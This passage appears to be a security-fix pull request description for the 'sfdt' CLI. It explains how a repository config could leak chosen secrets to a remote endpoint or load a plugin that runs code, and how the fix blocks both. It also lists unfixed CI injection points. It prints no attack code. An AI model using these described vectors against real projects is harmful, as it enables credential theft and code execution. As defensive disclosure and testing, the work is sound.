| **H3** | `ai.baseURL` + `ai.apiKeyEnv`/`headersEnv` let the config pick **which env var to read** and **where to send it** (verified leaking `SFDX_AUTH_URL`, `AWS_SECRET_ACCESS_KEY`, `NPM_TOKEN`) | non-loopback `ai.baseURL` refused; same for a notification channel's `headersEnv` beside a literal remote URL |
| **M2** | `allowedTools: []` silently disabled the provider read-only sandbox (`??` treats `[]` as supplied; gates tested `.length > 0`) | gate on the array **existing** |

## Why the opt-in is an environment variable

**An opt-in stored in `config.json` would be worthless** — the attacker who sets `plugins[]` sets `allowUnsafeConfig: true` on the next line. Trust has to arrive over a channel the repository does not control. The project's own security-review precedents already treat env vars as trusted ("attackers are generally not able to modify them in a secure environment"). Hence `SFDT_ALLOW_UNSAFE_CONFIG=1`. There is a test asserting a self-granting config is still refused.

## What deliberately still works

The guard removes the attacker-chosen **destination**, not the mechanism — so normal setups are untouched with no opt-in:

- `ai.apiKeyEnv` / `ai.headersEnv` load normally. They're only dangerous next to a destination the repo chose.
- **Loopback `ai.baseURL` is allowed** — Ollama, LM Studio, llama.cpp, vLLM keep working. A loopback destination cannot exfiltrate. (Mirrors the loopback test `ai.js` already applies when probing a provider.)
- A channel using `webhookUrlEnv` is never flagged; an ordinary Slack `webhookUrl` with no `headersEnv` is never flagged.
- `defaultOrg` is **not** load-blocked — every project legitimately sets it. (It stays API-blocked in gui-server.)

## Verification

`test/lib/config-trust-e2e.test.js` reproduces the actual RCE end-to-end through real `bin/sfdt.js`: a temp repo with a hostile `.sfdt/config.json` and a vendored plugin whose payload writes a marker file on import.

The suite asserts **both directions**, which matters — an earlier draft of this harness passed while proving nothing, because an incomplete fixture made `loadConfig` throw and `loadPlugins` swallow it. It now pins:

- payload does **not** run on a bare `sfdt --version` (H1 blocked)
- payload **does** run with `SFDT_ALLOW_UNSAFE_CONFIG=1` — proving the harness genuinely reproduces the exploit, so the block above is real and not an artifact
- a config that tries to grant itself trust is still refused
- the message names what was refused and how to allow it

The M2 tests were likewise confirmed to **fail against the old `.length > 0` gate** and pass with the fix.

- `npm test` → **5193/5193** (311 files; +31 new)
- `npm run lint` → clean
- `npm run check:all-contracts` → 5/5 OK
- `npm audit --audit-level=high --omit=dev` → exit 0

## Docs

- `docs/ARCHITECTURE.md` §18 — new threat-boundary row for `.sfdt/config.json` (the table was silent on it); amended the Secrets row to say the env-var *name* is itself a primitive; noted the sandbox gating rule.
- `docs/ENV-VARS.md` — new section for env vars read directly rather than flattened into scripts, documenting `SFDT_ALLOW_UNSAFE_CONFIG`.

## Follow-up, not in this PR

- **Workspace trust** (the agreed next step): a user-global trust store keyed by project root, VS Code style, with an interactive first-run prompt. This deny-by-default behaviour is what that model falls back to for non-interactive runs anyway, so it composes rather than being replaced.
- **M1** — `config.defaultOrg` interpolated unescaped into generated CI pipelines in shell position (conf 85). Different fix (escape at interpolation), different file.
- **L1** — `${{ github.event.pull_request.base.ref }}` straight into a `run:` block in `scripts/ci/github-deploy.yml`.
- **L2** — JWT key left on disk when login fails, GitLab/Bitbucket partials only; needs the `trap … EXIT` the other providers already use.
- The intermittent `bridge-routes-extra.test.js` flake, which can fail the real `npm publish` via `prepublishOnly`.

Once this lands, the CLI 0.21.1 + flow-core 0.11.0 release can resume.